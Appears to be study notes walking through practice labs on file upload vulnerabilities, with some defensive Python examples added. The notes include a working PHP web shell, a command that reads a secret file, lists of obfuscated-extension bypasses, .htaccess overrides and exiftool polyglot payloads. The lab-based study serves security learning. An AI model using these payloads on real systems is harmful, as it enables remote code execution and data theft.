# File Uploads Vulnerability

###### `burpsuite`

[TOC]

# Impact

The impact of a file upload vulnerability depends on two key factors.

## Website Validation

- File content
- File size
- File extension

## File Restrictions

- The restrictions imposed on the file once the upload has succeeded.

File upload vulnerabilities can lead to various exploits, such as uploading web shells or overwriting the current configuration files.

# How They Arise

Developers typically implement defenses in the file upload functionality; however, those defense mechanisms may have design flaws that an attacker can circumvent.

# How the Server Handles Requests for Files

Websites typically contain static files. When a user requests one of these files, it is parsed or executed and the result is returned in the HTTP response. The structure of a static file path usually maps 1:1 to the filesystem. However, modern websites are increasingly dynamic, and the path of a request often has no direct relationship to the filesystem at all.

## Static File Processing

The server parses the path to identify the file extension and compares it to a preconfigured mapping between extensions and MIME types.

![圖片](https://hackmd.io/_uploads/SJcvmCs_T.png)

Depending on the configuration of the website:

- If the file type is non-executable, such as an image or HTML, the application typically returns its content in the HTTP response.
- If the file type is executable, but the application is not configured to execute files of that type, the server typically returns an error message or the plain source code in the HTTP response.
- If the file is executable (for example PHP) and the application is configured to execute it, the application typically passes header values or query parameters into variables, and the result of execution is sent to the client in the HTTP response.

> Tip: The `Content-Type` header of the HTTP response can provide clues about what kind of file the server thinks it is serving.
# Exploiting Unrestricted File Upload to Deploy a Web Shell

If the application allows us to upload a server-side script (PHP, Java, Python) and is configured to treat it as a program and execute it, uploading one gives remote code execution.

> A web shell is a malicious script that allows an attacker to execute arbitrary system commands on the target. The attacker passes the command to the web shell endpoint via an HTTP query; the web shell receives the query and runs the command through a system call.

General form:

```php
<?php echo system($_GET['command']); ?>
```

## LAB: Remote Code Execution via Web Shell Upload

### Mapping the Target & Recon

![圖片](https://hackmd.io/_uploads/SJkVEbhOa.png)

### Analyzing the Attack Surface

#### Parameters

![圖片](https://hackmd.io/_uploads/BJnSE-2uT.png)

#### Functions

- Login
- Update Email
- Upload Photo

#### Points of Interest

We can test the Upload Photo functionality and attempt to upload a web shell.

### Identify

Identify the file upload vulnerability.

![圖片](https://hackmd.io/_uploads/BylxSZ3d6.png)
![圖片](https://hackmd.io/_uploads/r1TGIb3_T.png)
![圖片](https://hackmd.io/_uploads/r1vIUW3OT.png)
![圖片](https://hackmd.io/_uploads/HJ7yPW3dp.png)
![圖片](https://hackmd.io/_uploads/ryMewZnOa.png)

The application allows us to upload a PHP file! We have found a file upload vulnerability.

### Exploit

We can exploit the vulnerability to execute arbitrary commands on the target system.

```php
<?php echo system($_GET['command']); ?>
```

Retrieve sensitive data:

```
GET /files/avatars/phpWebShell1.php?command=cat /home/carlos/secret HTTP/2
```

![圖片](https://hackmd.io/_uploads/B1RjDW2_p.png)

ERKN0M0vTbojLcipnt0RJeYAnVH407eK

Solved!

# Exploiting Flawed Validation of Uploads

Typically, current websites have defenses to prevent the upload of scripts and their execution.

## Flawed File Type Validation

When submitting an HTML form, websites typically use `application/x-www-form-urlencoded` to send text to the back end. However, that encoding is not suitable for sending binary files; instead, `multipart/form-data` is used.
![圖片](https://hackmd.io/_uploads/HJyRB2hua.png)

Each form input is sent as a separate part of the request body. Each part carries its own headers, including a `Content-Disposition` (with the field name and, for files, the filename) and a `Content-Type` for that part.

Flawed defense: some websites use the `Content-Type` of the uploaded part to check the file. Because this value is set by the client, a proxy can change it and the upload goes through.

### LAB: Web Shell Upload via Content-Type Bypass

#### Mapping the Target & Recon

![圖片](https://hackmd.io/_uploads/Sk5-162_6.png)

#### Analyzing the Attack Surface

Parameters

![圖片](https://hackmd.io/_uploads/Byutya2d6.png)

Functionalities

- Login
- Upload Photo

#### Identify

Evaluate the Upload Photo functionality.

Upload a normal picture:

![圖片](https://hackmd.io/_uploads/S1U3Ma2uT.png)
![圖片](https://hackmd.io/_uploads/ryR1m63da.png)

The file is placed at `/files/avatars/Cat03.jpg`.

![圖片](https://hackmd.io/_uploads/BJ--4pnO6.png)
![圖片](https://hackmd.io/_uploads/SygKEa2dp.png)

Attempt to upload a PHP PoC to identify the vulnerability:

`<?php echo phpinfo(); ?>`

##### Defense mechanism

![圖片](https://hackmd.io/_uploads/BJw_p32dp.png)

According to the response, the website seems to use `Content-Type` to filter malicious files. A PHP file is sent with the MIME type `application/octet-stream` (that value is chosen on the client side).

Using a proxy to bypass it: `Content-Type: image/jpeg`

![圖片](https://hackmd.io/_uploads/Hk3eUahda.png)

`Content-Type -> text/html` -> This means the PHP code is placed and parsed in the HTML environment (server configuration!).

![圖片](https://hackmd.io/_uploads/rybH8p3dT.png)

There is a file upload vulnerability!

#### Exploit

Upload the web shell for RCE:

`<?php echo system($_GET['command']); ?>`

![圖片](https://hackmd.io/_uploads/SkWEwTn_T.png)
![圖片](https://hackmd.io/_uploads/r1E9OTndp.png)
![圖片](https://hackmd.io/_uploads/rJUgFp3dT.png)

Solved!
## Preventing File Execution in User-Accessible Directories

Some websites implement a second line of defense that prevents the server from running certain scripts: the file is served with `Content-Type: text/plain`. The server typically decides whether to execute the file based on the content type configured for that directory.

![圖片](https://hackmd.io/_uploads/Skg4LkA2_p.png)

Although this does not let us create a web shell, it provides a way to leak sensitive data or source code.

Note: a directory used for user-uploaded files typically has strict controls. If we find another way to upload the file somewhere else, it may allow us to run our web shell.

Tip: in `multipart/form-data`, the `filename` field is typically used to determine where the file should be placed.

### LAB: Web Shell Upload via Path Traversal

#### Mapping the Target & Recon

#### Analyzing the Attack Surface

Parameters

![圖片](https://hackmd.io/_uploads/Byutya2d6.png)

Functionalities

- Login
- Upload Photo

#### Identify

Evaluate the Upload Photo functionality.

Upload a normal picture:

![圖片](https://hackmd.io/_uploads/HybJHAhOT.png)

Attempt to upload the PHP PoC:

![圖片](https://hackmd.io/_uploads/BJEzBChO6.png)

Defense mechanism (optional)

##### The current directory does not allow running scripts

![圖片](https://hackmd.io/_uploads/Sy_orC3_T.png)
![圖片](https://hackmd.io/_uploads/S1e8B0nup.png)

We can attempt to escape the current directory when uploading the file and circumvent the directory control.

![圖片](https://hackmd.io/_uploads/HkWRLRnOT.png)
![圖片](https://hackmd.io/_uploads/SkbcP02_a.png)
![圖片](https://hackmd.io/_uploads/r1w2vA3_a.png)

According to the result, the server lets us use path traversal to control the upload path.

We found a directory that is public and is not intended for user uploads.

![圖片](https://hackmd.io/_uploads/B1X1uC3Oa.png)

We can attempt to upload the PHP PoC there.

![圖片](https://hackmd.io/_uploads/Sy_K_An_a.png)
![圖片](https://hackmd.io/_uploads/rJsQYC2ua.png)

#### The traversal sequence was stripped!
Not Found. The reason is that our `../` was stripped by the upload functionality.

![圖片](https://hackmd.io/_uploads/ByirqAnOa.png)

Ways to get around it:

- Attempt `...//` (fails)
- URL-encode the traversal sequence

![圖片](https://hackmd.io/_uploads/S1iPjCn_T.png)
![圖片](https://hackmd.io/_uploads/HJSx302u6.png)

Success!

![圖片](https://hackmd.io/_uploads/r1TV3C3dT.png)

Combining path traversal with the upload vulnerability, we successfully ran PHP on the website!

#### Exploit

Upload the web shell.

![圖片](https://hackmd.io/_uploads/Bk2yT02da.png)
![圖片](https://hackmd.io/_uploads/HJKBpA2uT.png)
![圖片](https://hackmd.io/_uploads/SyHG6C2_6.png)

Solved!

![圖片](https://hackmd.io/_uploads/Bk5daR3_a.png)

## Bypassing File Type Blacklisting

In some cases we can bypass a file extension blacklist by using lesser-known executable extensions, such as `.php5` or `.shtml`, when uploading a PHP file.

## Overriding the Server Configuration

As we learned previously, the server typically restricts execution of PHP files. It only executes files whose extensions are mapped in the configuration file, as follows.

### apache2.conf

Default configuration path: `/etc/apache2/apache2.conf`

```
LoadModule php_module /usr/lib/apache2/modules/libphp.so
AddType application/x-httpd-php .php
```

- `LoadModule php_module /usr/lib/apache2/modules/libphp.so`: dynamically loads the PHP module.
- `AddType application/x-httpd-php .php`: instructs the server to treat files with the `.php` extension as PHP scripts (MIME type `application/x-httpd-php`).

### .htaccess (hidden file)

Apache per-directory configuration file (`.htaccess`). `.htaccess` is a per-directory configuration file that can override the server configuration settings. Because of this feature, it lets an attacker add new configuration: if we can find a way to upload a `.htaccess` file to the web application, it may bypass the restriction on file execution in an untrusted directory.
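Returning to the path traversal lab above: as an added example (not the lab's or the author's code), this contrasts the single `../` strip the lab defeats with a URL-encoded name against a check that decodes first and then accepts only a bare file name. `UPLOAD_DIR` and the helper names are assumptions.

```python
"""Added example (not the lab's or the author's code): the filename
handling the path traversal lab exploits, next to a check that closes it.
UPLOAD_DIR and the helper names are assumptions."""
import posixpath
from urllib.parse import unquote

UPLOAD_DIR = "/var/www/files/avatars"   # assumed layout, matching the lab URL


def weak_sanitize(filename: str) -> str:
    """The lab's first line of defence: strip '../' once, then join.
    A URL-encoded '..%2f' survives the strip; if the server decodes the
    stored path later, the traversal still happens."""
    return posixpath.join(UPLOAD_DIR, filename.replace("../", ""))


def resolved_by_server(path: str) -> str:
    """Where a server that URL-decodes the stored path really writes."""
    return posixpath.normpath(unquote(path))


def safe_upload_path(filename: str) -> str:
    """Decode fully, accept only a bare file name, and confirm the
    normalised target is still directly inside UPLOAD_DIR.
    Extension and content checks are a separate layer."""
    decoded = filename
    while True:                              # undo double encoding
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    if (not decoded or decoded in (".", "..") or "\x00" in decoded
            or "/" in decoded or "\\" in decoded):
        raise ValueError(f"rejected filename: {filename!r}")
    target = posixpath.normpath(posixpath.join(UPLOAD_DIR, decoded))
    if posixpath.dirname(target) != UPLOAD_DIR:
        raise ValueError(f"escapes upload directory: {filename!r}")
    return target


def is_rejected(filename: str) -> bool:
    """True when safe_upload_path refuses the name."""
    try:
        safe_upload_path(filename)
    except ValueError:
        return True
    return False
```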
### web.config

For IIS servers (an XML file):

```xml
<staticContent>
  <mimeMap fileExtension=".json" mimeType="application/json" />
</staticContent>
```

This XML configuration tells the server how to handle files with the `.json` extension; `mimeMap` specifies the file type (`application/json`).

If we can upload an arbitrary malicious configuration file, we can define a custom file extension and map it to an executable MIME type to bypass the blacklist:

```
AddType application/x-httpd-php .meowMalisous
```

### LAB: Web Shell Upload via Extension Blacklisting Bypass

#### Mapping the Target & Recon

![圖片](https://hackmd.io/_uploads/S1cIgtncp.png)

#### Analyzing the Attack Surface

- Parameters

![圖片](https://hackmd.io/_uploads/r11q-Kn9p.png)

Functionalities

- Update Email
- Upload Avatar

#### Identify

Upload Avatar: normal file upload

![圖片](https://hackmd.io/_uploads/SJrJNt2qa.png)

Upload of a `.php` file (fails)

![圖片](https://hackmd.io/_uploads/r1DyrYnqa.png)

Defense mechanism (optional)

![圖片](https://hackmd.io/_uploads/SJbmrF2qp.png)

Identify the defense mechanism -> blacklisting

![圖片](https://hackmd.io/_uploads/S1eW8Y3qT.png)

##### Bypass the blacklisting defense

Alternative PHP extensions:

```
phtml
php
php3
php4
php5
inc
pHtml
pHp
pHp3
pHp4
pHp5
iNc
iNc%00
iNc%20%20%20
iNc%20%20%20...%20.%20..
iNc......
inc%00
inc%20%20%20
inc%20%20%20...%20.%20..
inc......
pHp%00
pHp%20%20%20
pHp%20%20%20...%20.%20..
pHp......
pHp3%00
pHp3%20%20%20
pHp3%20%20%20...%20.%20..
pHp3......
pHp4%00
pHp4%20%20%20
pHp4%20%20%20...%20.%20..
pHp4......
pHp5%00
pHp5%20%20%20
pHp5%20%20%20...%20.%20..
pHp5......
pHtml%00
pHtml%20%20%20
pHtml%20%20%20...%20.%20..
pHtml......
php%00
php%20%20%20
php%20%20%20...%20.%20..
php......
php3%00
php3%20%20%20
php3%20%20%20...%20.%20..
php3......
php4%00
php4%20%20%20
php4%20%20%20...%20.%20..
php4......
php5%00
php5%20%20%20
php5%20%20%20...%20.%20..
php5......
phtml%00
phtml%20%20%20
phtml%20%20%20...%20.%20..
phtml......
```

PHP

![圖片](https://hackmd.io/_uploads/B10CUYh9a.png)

Upload a php3 web shell

![圖片](https://hackmd.io/_uploads/Syt0DKh5p.png)

php3

![圖片](https://hackmd.io/_uploads/B1jg_Fn5a.png)

php5

![圖片](https://hackmd.io/_uploads/H1HBtYh96.png)

Attempting to upload a PHP file (not allowed to execute).

##### Override the Server Configuration

Attempt to upload a `.htaccess` file (global). Modify the filename and `Content-Type`.

Mapping `.meowfile` -> PHP script:

```
AddType application/x-httpd-php .meowfile
```

![圖片](https://hackmd.io/_uploads/BJbqpK29T.png)

Upload the proof file -> `phpinfo.meowfile`

![圖片](https://hackmd.io/_uploads/r1zf6K3cT.png)
![圖片](https://hackmd.io/_uploads/S1VR6Khqp.png)

Arbitrary PHP execution => flawed file validation + arbitrary file upload + overridden server configuration.

#### Exploit

Read the sensitive file:

```php
<?php echo file_get_contents("/home/carlos/secret"); ?>
```

![圖片](https://hackmd.io/_uploads/rJwDJc3qp.png)
![圖片](https://hackmd.io/_uploads/BktuJ9hqT.png)
![圖片](https://hackmd.io/_uploads/r1Y9192qT.png)
![圖片](https://hackmd.io/_uploads/BkVs15n5p.png)

Solved

## Obfuscating File Extensions

If the validation is case-sensitive and treats `pHp` and `php` as different, while the server executes both, the upload of a PHP file may be allowed.

### Multiple Extensions (whitelist bypass)

```
exploit.php.jpg
```

Validation: recognized as `.jpg`. Execution: treated as a PHP file, depending on the algorithm used.

### Adding Trailing Characters

Validation: `exploit.php ` (with a trailing space) is not identified as a PHP file. Execution: the trailing whitespace is ignored or stripped, so it runs as `exploit.php`.

### URL Encoding

```
exploit%2Ephp
```

Validation: `exploit%2Ephp` (not recognized as a PHP file).
Execution (the server decodes the URL encoding): `exploit.php`

### Adding Null Bytes or Semicolons

```
exploit.asp;.jpg
exploit.asp%00.jpg
```

When the web service is implemented in C/C++ but validation is done in a higher-level language, the two may parse the filename differently.

Validation (PHP/Java): `exploit.asp%00.jpg` (not on the blacklist).

Execution (C/C++): `;` or `%00` is treated as the end of the filename, so the `.jpg` extension is stripped or ignored.

### Using Multibyte Unicode Characters

```
xC0 x2E, xC4 xAE or xC0 xAE
```

These sequences may be converted to `.` (`x2E`) after Unicode normalization or conversion to ASCII, after the validation has already run.

### Flawed Sanitization

If `.php` is stripped only once (non-recursively), the following name becomes `exploit.php`:

```
exploit.p.phphp
```

![圖片](https://hackmd.io/_uploads/B1f_xWPXA.png)

### LAB: Web Shell Upload via Obfuscated File Extension

#### Mapping the Target & Recon

![圖片](https://hackmd.io/_uploads/rkaB1jnqp.png)

#### Analyzing the Attack Surface

- Parameters

![圖片](https://hackmd.io/_uploads/r11q-Kn9p.png)

Functionalities

- Update Email
- Upload Avatar

#### Identify

Avatar upload functionality:

Normal file: JPG

![圖片](https://hackmd.io/_uploads/rkKtJin9T.png)

Attempting to upload a PHP file

![圖片](https://hackmd.io/_uploads/BkTexo29p.png)

Defense mechanism -> whitelisting (only JPG allowed)

Attempt to upload a file with an obfuscated extension.

##### Multiple extensions

```
file.png.php
file.png.Php5
```

![圖片](https://hackmd.io/_uploads/BJmqfjhc6.png)

#### Adding special characters at the end
```
file.png.php
file.png.pHp5
file.php\x00.png
file.php%OO.png
file.php%0a.png
file.php%0d%0a.png
```

`%0d%0a` -> newline (URL-encoded CRLF)

![圖片](https://hackmd.io/_uploads/SJKXNjnqp.png)

According to the fuzzing result, the filename has to end in `.png`/`.jpg`; `%0a%0d` does not work for file execution.

![圖片](https://hackmd.io/_uploads/H1WNBs3q6.png)

`\x00` is valid; `%00` is valid.

![圖片](https://hackmd.io/_uploads/BktoLoh9p.png)

Based on this information we can try:

```
file.php%00.png
```

![圖片](https://hackmd.io/_uploads/ryl-ishc6.png)

Arbitrary command execution -> obfuscated file extension accepted + PHP file execution allowed (default).

#### Exploit

Read sensitive data

![圖片](https://hackmd.io/_uploads/Sye9Yii3qa.png)
![圖片](https://hackmd.io/_uploads/Hk0qij39T.png)
![圖片](https://hackmd.io/_uploads/SJGnjshca.png)

Solved!

## Flawed Validation of the File's Content

More secure services verify properties of an image, such as its dimensions (a pure PHP script has no image dimensions) or its leading byte sequence (`FF D8 FF` for JPEG, also called the magic number).

But we can use ExifTool to inject code into the image's metadata:

```
exiftool -Comment="<?php echo 'START ' . phpinfo() . ' END'; ?>" original.jpg -o jpgPropertyContainPHPcode.php
```

This adds the PHP payload to the image's `Comment` field. When the file is executed, the result is returned in the response alongside the binary image data.

![圖片](https://hackmd.io/_uploads/BklSxBJsa.png)

### LAB: Remote Code Execution via Polyglot Web Shell Upload

#### Mapping the Target & Recon

![圖片](https://hackmd.io/_uploads/HJqqbHJsp.png)

#### Analyzing the Attack Surface

##### Parameters

![圖片](https://hackmd.io/_uploads/r11q-Kn9p.png)

##### Functionalities

- Update Email
- Upload Avatar

#### Identify

##### File upload vulnerability -> Upload Avatar

Normal upload:

![圖片](https://hackmd.io/_uploads/rkCZZBys6.png)
![圖片](https://hackmd.io/_uploads/SJpuzryop.png)

Upload the proof-of-concept file:

```
phpinfo()
```

![圖片](https://hackmd.io/_uploads/Sk-AMS1sT.png)

Identify the defense mechanism (file upload):

![圖片](https://hackmd.io/_uploads/Bk2z7r1s6.png)

We attempted to upload a file with a valid `.jpg` extension and were rejected, so we can infer that the server verifies the file by its content (dimensions or magic bytes).

Bypass the content validation: inject the PoC code into the metadata via exiftool.

```
exiftool -Comment="<?php echo 'START ' . phpinfo() . ' END'; ?>" ./Cat03.jpg -o JPGwithPHPinfo.php
```

![圖片](https://hackmd.io/_uploads/Bkt1LryiT.png)
![圖片](https://hackmd.io/_uploads/rygRrrJoa.png)
![圖片](https://hackmd.io/_uploads/SkHUUBJja.png)
![圖片](https://hackmd.io/_uploads/HyBdLrys6.png)

RCE!

#### Exploit

Read the sensitive file (the PHP expression must be a single script; nesting a second `<?php` tag inside the first would be a parse error):

```
exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" ./Cat03.jpg -o JPGwithPHPcode.php
```

![圖片](https://hackmd.io/_uploads/ryeCtBkop.png)
![圖片](https://hackmd.io/_uploads/r1wiKSJsp.png)
![圖片](https://hackmd.io/_uploads/H1S89Syi6.png)

Solved!

# Exploiting File Upload Race Conditions (skip)

(skip)

# Exploiting File Upload Vulnerabilities Without RCE

## Uploading Malicious Client-Side Scripts

By uploading HTML files or SVG images, we can potentially use `<script>` tags to create stored XSS payloads.
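Looking back at the blacklist, `.htaccess` and obfuscated-extension labs above, and at the HTML/SVG point just made: as an added example (not the labs' or the author's code), this puts the checks those labs defeat next to an allowlist that canonicalizes the name the way the server will before deciding. The helper names and the allowlist contents are assumptions.

```python
"""Added example (not the lab's code): why the blacklist and the single
'.php' strip fail, and an allowlist that canonicalises the name first.
Inputs are the obfuscated names discussed above; helper names are
hypothetical."""
import re
import secrets

BLACKLIST = (".php", ".php5", ".phtml")      # all the weak check knows
ALLOWLIST = {"jpg", "jpeg", "png"}           # no html/svg, no config files


def weak_blacklist_allows(filename: str) -> bool:
    """Case-sensitive suffix check on the raw, still URL-encoded name."""
    return not filename.endswith(BLACKLIST)


def weak_strip_php(filename: str) -> str:
    """Non-recursive removal: exploit.p.phphp -> exploit.php."""
    return filename.replace(".php", "")


def canonical_extension(filename: str):
    """Extension the server would actually act on, or None to reject.
    Models the parsing differences listed above: %XX is decoded, the
    name is cut at NUL or ';' (C-style parsers), trailing spaces and
    dots are dropped (Windows), and case is folded."""
    name = re.sub(r"%([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1), 16)), filename)
    name = name.split("\x00", 1)[0].split(";", 1)[0].rstrip(" .")
    if ("/" in name or "\\" in name or not name.isascii()
            or not name.isprintable()):
        return None                 # traversal, multibyte tricks, CR/LF
    parts = name.split(".")
    if len(parts) != 2 or not parts[0]:
        return None                 # one extension only; rejects .htaccess
    return parts[1].lower()


def allowlist_accepts(filename: str) -> bool:
    ext = canonical_extension(filename)
    return ext is not None and ext in ALLOWLIST


def stored_name(filename: str) -> str:
    """Server-chosen name: random stem plus the validated extension, so
    the client's name never reaches the filesystem."""
    if not allowlist_accepts(filename):
        raise ValueError(f"rejected upload name: {filename!r}")
    return f"{secrets.token_hex(8)}.{canonical_extension(filename)}"
```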
## Exploiting Parsing or Processing of Other File Formats

Microsoft Office `.doc` or `.xls` files may be a potential vector for XXE injection attacks if the server parses them.

# Uploading Files Using PUT

Test which methods the server supports with an `OPTIONS` request.

```http
PUT /images/exploit.php HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-httpd-php
Content-Length: 24

<?php echo phpinfo(); ?>
```

# Preventing File Upload Vulnerabilities (skip)

---

<!--
### LAB-WEB shell upload via Content-Type bypass.
#### Mapping the target & Recon
##### Prameters
##### Functionalities
#### Analysis the Attack Surface
#### Identify
Defense machnism (Optional)
#### Exploit
-->
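The prevention section above is skipped, so as an added example (not the author's or the labs' code) here is the content-level check that the Content-Type bypass and polyglot labs show to be insufficient on its own, with a scan for script open tags and a metadata-stripping pass that removes the COM segment the exiftool command writes to. The JPEG bytes are a constructed minimal sample; a real deployment would also store the result under a server-chosen name in a directory that never executes scripts.

```python
"""Added example (not the lab's or the author's code): a magic-byte check
of the kind the polyglot lab defeats, a scan for script open tags, and a
metadata-stripping pass that removes the COM segment exiftool writes to.
The JPEG below is a constructed minimal sample, not a real photo."""
SOI, EOI, SOS, COM = 0xFFD8, 0xFFD9, 0xFFDA, 0xFFFE
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")


def magic_ok(data: bytes) -> bool:
    """Signature-only check (FF D8 FF); passes any JPEG, polyglot or not."""
    return data[:3] == b"\xff\xd8\xff"


def contains_script_marker(data: bytes) -> bool:
    """Cheap second check: look for script open tags anywhere in the file."""
    low = data.lower()
    return any(m in low for m in SCRIPT_MARKERS)


def strip_metadata(data: bytes) -> bytes:
    """Rewrite a JPEG without COM (FF FE) and APPn (FF E0..FF EF) segments,
    the places where exiftool-style comment injection lands. Segments are
    walked up to SOS; the entropy-coded data after SOS is copied as is."""
    if not magic_ok(data):
        raise ValueError("not a JPEG")
    out = bytearray(data[:2])                    # keep SOI
    i = 2
    while i + 2 <= len(data):
        if data[i] != 0xFF:
            raise ValueError("corrupt segment header")
        marker = (data[i] << 8) | data[i + 1]
        if marker == EOI:
            break
        if marker == SOS:                        # image data follows
            out += data[i:]
            return bytes(out)
        if i + 4 > len(data):
            raise ValueError("truncated segment")
        length = int.from_bytes(data[i + 2:i + 4], "big")
        if marker != COM and not 0xFFE0 <= marker <= 0xFFEF:
            out += data[i:i + 2 + length]        # keep DQT, SOF, DHT, ...
        i += 2 + length
    out += EOI.to_bytes(2, "big")
    return bytes(out)


def build_polyglot(payload: bytes) -> bytes:
    """Constructed test vector: SOI, one COM segment holding the payload,
    EOI. Enough to pass magic_ok, as the lab's exiftool output does."""
    com = COM.to_bytes(2, "big") + (len(payload) + 2).to_bytes(2, "big") + payload
    return SOI.to_bytes(2, "big") + com + EOI.to_bytes(2, "big")
```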